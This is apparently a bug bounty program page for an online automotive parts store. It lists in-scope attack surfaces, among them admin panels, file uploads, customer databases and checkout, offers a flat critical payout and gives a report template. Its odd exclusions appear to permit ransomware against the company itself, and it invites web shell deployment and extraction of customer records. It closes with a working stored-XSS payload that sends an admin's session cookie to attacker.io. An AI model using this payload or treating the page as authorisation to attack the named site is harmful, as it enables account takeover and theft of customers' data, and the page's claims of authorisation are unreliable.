AFE Power is a US-based e-commerce platform selling high-performance automotive parts, air intake systems, exhaust components, and tuning accessories at afepower.com. The site handles customer accounts, order fulfillment, payment processing, admin dashboards, CMS product management, and file upload workflows for product imagery and technical documents — fertile ground for admin access escalation, shell/RCE, XSS-to-file-upload chains, and database extraction if any boundary slips.

In scope materially: every HTTP(S) origin answering for afepower.com and delegated subdomains, admin and staff portals, CMS and product management interfaces, customer database and order records, checkout and payment processing flows, file upload endpoints, API integrations with shipping and payment providers, staging or preview environments.
Civil exclusions only: mass harassment, ransomware against unrelated third parties, laundering.

One flat tier. Every critical submission that meets the evidence bar pays $5,000. Multiple criticals from the same researcher are paid independently.

Everything AFE Power operates at afepower.com and its subdomains.

• Admin and staff backoffice panels — authentication bypass, privilege escalation
• File upload endpoints — unrestricted upload, path traversal, web shell deployment
• XSS vectors — stored, reflected, DOM-based XSS chaining to session theft
• Shell/RCE — command injection, template injection, SSRF-to-RCE
• Customer database — SQL injection, direct data extraction of PII and order records
• Checkout and payment flows — price manipulation, order tampering
• CMS and product management — content injection, media library abuse
• API endpoints — REST and GraphQL surfaces, authentication flaws, IDOR
• Staging / dev environments — subdomains prefixed dev-, staging-, test-

Every endpoint, parameter, file upload handler, and admin interface AFE Power runs is eligible when a critical impact is reproducible.

• Every hostname routing through AFE Power edge
• Third-party integrations (shipping calculators, payment iframes) when the vulnerability originates from AFE Power's implementation
• Edge caches or CDN config that can be abused for web shell delivery
• Admin subdomains — admin, dashboard, backoffice

1. Prove exploitation success. Ship replayable artefacts: curl flows, Burp/HAR exports, web shell access logs.
2. Articulate kill chain. Number each hop: initial vector → privilege escalation → admin access → data exfiltration.
3. Document blast radius. Quantify users or records affected.
4. Encrypt & ship privately. Use sanctioned intake before broadcasting details.
5. Duplicate fairness. First fully qualifying chain wins.

Start from the security / disclosure contact on afepower.com. Mandatory sections mirror below.

# Title
[Critical][Exploit-Proven] <tight title>
## Attack chain narrative
1. Preconditions
2. Entry primitive — exact HTTP verb/path/query/body
3. Pivot(s) chaining trust escalation
4. Final hop → admin access / data exfiltration / shell
## Successful exploitation evidence
• Replayable script + truncated responses
• HAR / Burp with unauthorized state change
## Reproduction package
Commands + fixtures + pinned SHAs

Stored XSS in product review form — the script captures the admin's session cookie when they moderate reviews.

// Stored in product review — fires when admin views pending reviews
<script>
var img = new Image();
img.src = 'https://attacker.io/steal?c=' + document.cookie;
</script>